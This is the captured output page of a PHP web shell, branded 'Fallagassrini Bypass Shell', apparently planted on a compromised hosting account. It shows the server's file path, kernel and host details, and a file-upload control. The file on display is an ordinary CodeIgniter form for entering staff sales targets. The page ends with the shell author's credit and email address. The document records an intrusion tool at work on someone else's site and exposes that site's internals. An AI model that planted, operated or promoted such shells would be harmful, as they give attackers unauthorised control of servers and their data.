? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/piadraft/system/application/views/Sales/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/piadraft/system/application/views/Sales/addsettarget.php

<?php  if ( ! defined('BASEPATH')) exit('No direct script access allowed');?>
<script type="text/javascript">

jQuery(document).ready(function () {

	$('.one').datepick({dateFormat: 'dd-mm-yyyy'});
       $('.two').datepick({dateFormat: 'dd-mm-yyyy'});
       suggestemployee();

});

</script>
    <div class="select-bar">
<label>
    <img src="<?=base_url()?>/assets/images/backbutton.png" title="Back"  onclick="loadsettarget('<?=$_SESSION['pagenum']?>','<?=$_SESSION['searchoption']?>','<?=$_SESSION['searchtxt']?>')" alt="Back" align = "center" width="25" height="25"/></label>

		  </div>
<fieldset>
    <legend>Add Staff - Target</legend>
    <?php
     $attributes = array('id' => 'customForm');
    echo form_open('sales/addsettarget',$attributes);?>

    <?php
$options = array(
     'Select'  => 'Select',
    'Monthly'  => 'Monthly',
                  'Quarterly'    => 'Quarterly',
                  'Semi-Annually'    => 'Semi-Annually',
                  'Annually'    => 'Annually',
                  'Others'    => 'Others',

                 );
$attri= 'onChange="getperiod(this.value);" id="target_period"';

?>

    <ul>

        <li>

        <label>Employee Name:</label>



    <input type="text" id="employee" size="35">
					<input type="hidden" name="employee_id" id="employee_id">
	 <span id="staffnameInfo" class="red_bold">*</span>
        </li>
 <li id="stfinfodet"></li>
<li>
        <label for="Name">Target Period</label>
            <?php echo form_dropdown('targettype', $options, 'Select',$attri); ?><span id="fromInfo" class="red_bold"></span>
        </li>

        <li>
            <label>Start Date</label>

            <input class="one" name="startdate" id="startdate" readonly="true"  type="text" style="background-image: url(../../../../assets/images/datefocus.gif);">
                                </li><span id="startdateInfo" class="red_bold">*</span>
                                <li id="enddatewer">
                                    <label>End Date</label>
                                    <input class="two" name="enddate" type="text" id="enddate" readonly="true" style="background-image: url(../../../../assets/images/datefocus.gif);">
                                </li>
         <li>
        <label for="Name">Target Premium</label>
             <?php echo form_input('target'); ?>  <span id="targetInfo" class="red_bold">*</span>
        </li>
        <li>
        <label for="currency">Currency</label>
        <select id="curr_id" name="curr_id">
        <?php
        foreach($curren as $currency)
        {
            echo "<option value='". $currency['id']."'>". $currency['currencyname']."</option>";
        }
        ?>


           </select>
        </li>


        <li><label for="submit">&nbsp;</label>
        	<button type="submit" class="clickimage" id="submit" onclick="return doallthetwo();">Save</button>
        </li>
    </ul>
<?php echo form_close();?>
</fieldset>


bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net